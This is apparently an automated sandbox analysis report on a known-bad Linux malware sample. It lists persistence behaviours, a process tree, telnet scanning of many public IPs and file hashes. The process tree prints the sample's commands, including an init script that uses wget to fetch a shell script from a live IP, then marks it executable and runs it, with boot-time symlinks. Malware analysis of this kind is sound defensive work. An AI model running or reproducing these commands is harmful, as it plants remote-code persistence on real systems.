Analysis Overview
SHA256
35cd367a1fb9c6d29e748b51e42ed8ceee321a1f874aafacc4af3e663049234f
Threat Level: Known bad
The file 19991040084.zip was found to be: Known bad.
Malicious Activity Summary
yara_template
File and Directory Permissions Modification
Modifies Watchdog functionality
Checks mountinfo of local process
Creates/modifies environment variables
Modifies init.d
Modifies rc script
Modifies systemd
Modifies Bash startup script
Changes its process name
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-25 09:14
Signatures
yara_template
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-25 09:14
Reported
2024-11-25 09:17
Platform
ubuntu2404-amd64-20240729-en
Max time kernel
148s
Max time network
128s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /bin/sh | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
Checks mountinfo of local process
| Description | Indicator | Process | Target |
| File opened for reading | /proc/2655/mountinfo | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
Creates/modifies environment variables
| Description | Indicator | Process | Target |
| File opened for modification | /etc/profile | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
Modifies init.d
| Description | Indicator | Process | Target |
| File opened for modification | /etc/init.d/system | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
| File opened for modification | /etc/init.d/sh | /bin/sh | N/A |
Modifies rc script
| Description | Indicator | Process | Target |
| File opened for modification | /etc/rc.local | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
Modifies systemd
| Description | Indicator | Process | Target |
| File opened for modification | /etc/systemd/system/custom.service | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
Modifies Bash startup script
| Description | Indicator | Process | Target |
| File opened for modification | /etc/profile | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/status | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
| File opened for reading | /proc/1/cgroup | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/systemctl | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/mkdir | N/A |
Processes
/tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911
[/tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911]
/bin/sh
[sh -c systemctl enable custom.service >/dev/null 2>&1]
/usr/bin/systemctl
[systemctl enable custom.service]
/bin/sh
[sh -c chmod +x /etc/init.d/system >/dev/null 2>&1]
/usr/bin/chmod
[chmod +x /etc/init.d/system]
/bin/sh
[sh -c ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1]
/usr/bin/ln
[ln -s /etc/init.d/system /etc/rcS.d/S99system]
/bin/sh
[sh -c echo "#!/bin/sh # /etc/init.d/sh case \"$1\" in start) echo 'Starting sh' /bin/sh & wget http://193.143.1.70/ -O /tmp/lol.sh chmod +x /tmp/lol.sh /tmp/lol.sh & ;; stop) echo 'Stopping sh' killall sh ;; restart) $0 stop $0 start ;; *) echo \"Usage: $0 {start|stop|restart}\" exit 1 ;; esac exit 0" > /etc/init.d/sh]
/bin/sh
[sh -c chmod +x /etc/init.d/sh >/dev/null 2>&1]
/usr/bin/chmod
[chmod +x /etc/init.d/sh]
/bin/sh
[sh -c mkdir -p /etc/rc.d >/dev/null 2>&1]
/usr/bin/mkdir
[mkdir -p /etc/rc.d]
/bin/sh
[sh -c ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1]
/usr/bin/ln
[ln -s /etc/init.d/sh /etc/rc.d/S99sh]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 154.216.19.139:199 | tcp | |
| US | 154.216.19.139:199 | tcp | |
| US | 154.216.19.139:199 | tcp | |
| RU | 193.143.1.70:38242 | tcp | |
| US | 166.221.116.6:23 | tcp | |
| JP | 126.40.23.30:23 | tcp | |
| DE | 94.219.168.205:23 | tcp | |
| SG | 170.165.2.86:23 | tcp | |
| NL | 83.96.228.126:23 | tcp | |
| JP | 202.244.30.63:23 | tcp | |
| US | 162.236.109.110:23 | tcp | |
| UA | 95.133.98.202:23 | tcp | |
| LT | 158.129.189.242:23 | tcp | |
| CA | 20.116.227.186:23 | tcp | |
| US | 12.248.212.11:23 | tcp | |
| QA | 89.211.5.75:23 | tcp | |
| US | 32.107.0.197:23 | tcp | |
| CA | 64.10.68.86:23 | tcp | |
| GB | 2.123.80.70:23 | tcp | |
| US | 169.94.192.89:23 | tcp | |
| TH | 115.87.169.192:23 | tcp | |
| US | 66.94.65.23:23 | tcp | |
| US | 7.223.141.230:23 | tcp | |
| US | 50.168.146.255:23 | tcp | |
| DE | 2.174.123.99:23 | tcp | |
| TW | 34.81.97.21:23 | tcp | |
| US | 153.59.50.201:23 | tcp | |
| US | 170.97.182.53:23 | tcp | |
| IT | 45.205.17.68:23 | tcp | |
| US | 71.26.7.137:23 | tcp | |
| KR | 169.217.198.60:23 | tcp | |
| US | 168.207.146.101:23 | tcp | |
| TW | 111.252.41.220:23 | tcp | |
| US | 134.150.237.12:23 | tcp | |
| JP | 210.88.114.210:23 | tcp | |
| GB | 109.234.225.10:23 | tcp | |
| GB | 90.214.188.164:23 | tcp | |
| JP | 118.236.246.228:23 | tcp | |
| US | 55.185.57.127:23 | tcp | |
| CN | 113.87.157.50:23 | tcp | |
| US | 76.86.186.216:23 | tcp | |
| JP | 126.24.240.187:23 | tcp | |
| US | 97.99.30.139:23 | tcp | |
| FR | 195.220.72.202:23 | tcp | |
| US | 130.207.137.55:23 | tcp |
Files
/etc/systemd/system/custom.service
| MD5 | 19a440fdac7f578f2fb33719698a082c |
| SHA1 | ebadce21c65d05ad62a324deb39c57aecd3edf2c |
| SHA256 | b176d41b748466f8ba35246c78a1c940f65403b363c086ccd5b5de577a87cf69 |
| SHA512 | 8bdfac90e7235fc35eeec141a1e2145ed4ea5a250b71bdf0cf0e5e5aa59ab6dc004dc08561bd5547c4a4a106138c98950dc2098c905ce785b9b2c0657684d7bb |
/etc/inittab
| MD5 | 3d6b6e1b05ad5d0538ccd8804bcd279b |
| SHA1 | 0fc061b51c225d5bea072c939de05e8a856558bc |
| SHA256 | cab2df9c1c498df29445837610f14ae08d4af98d3acac69b0581c01fe594e3c5 |
| SHA512 | 1957857cffbc0d526eb04e40db166d661b9dc59fc31fb5551f31cd58d270f839ffa2098e81c8555b12e9dbd55ba17df662b14c6441a6389eb9a76082fa401c98 |
/boot/bootcmd
| MD5 | 735cae7d3cbab0f59d95f84790282103 |
| SHA1 | 1cb77931b3097f18988016c9ceba3280a5ccb2ae |
| SHA256 | dfdd4cf729384e4ed52516ab72bd86be286c80f53d4f5b764fd2dd2a2b2c983b |
| SHA512 | 998daa467c4ee63dd41515897728de70cbb9c579ca8b16c26d8e6db5edad53c6dbd6343fb10eda3dbc29b0cb1fa72a9b2653250e9027e6ee02d17726e958bbfe |
/etc/init.d/system
| MD5 | f000251d92c773cc3ee1ca22cf5f0788 |
| SHA1 | e2386fe6a5f29b1e9e5ad5b38928c024f97105e6 |
| SHA256 | 31a77745dd3724a0691a9255738b9c87516868932e3eb992e2afafcd0574a985 |
| SHA512 | 0dad5adaa7742dd208596fefad53ab21c39fbf2cbe5c9958b92170d555d316f0a0b02ec5236311b869aa18e90592e81439a3a229bf1307b5daf87d87c5f493c2 |
/etc/init.d/sh
| MD5 | c5583b6a699f62cb0a004c99842f5c70 |
| SHA1 | b232ef89bf9b36643b5956aaacfd295b9ce2a0a7 |
| SHA256 | 2b03c83558e4af71f3b35408cf668a2ee06931c21adec760952a21a11bc4c59b |
| SHA512 | a9fc1e4c30452a3d100a8ccfbb707d9d323830fbbca90c98d3c126bf943539baaf1fccb04d435a4b627ed7f1bfb1bbd649dab282488d951dde87e097423e154d |
/etc/motd
| MD5 | 2bd9b4be30579e633fc0191aa93df486 |
| SHA1 | 7d63a9bd9662e86666b27c1b50db8e7370c624ff |
| SHA256 | 64dc39f3004dc93c9fc4f1467b4807f2d8e3eb0bfa96b15c19cd8e7d6fa77a1d |
| SHA512 | ae6dd7b39191354cf43cf65e517460d7d4c61b8f5c08e33e6ca3c451dc7cab4de89f33934c89396b80f1aade0a4e2571bd5ae8b76ef80b737d4588703d2814d5 |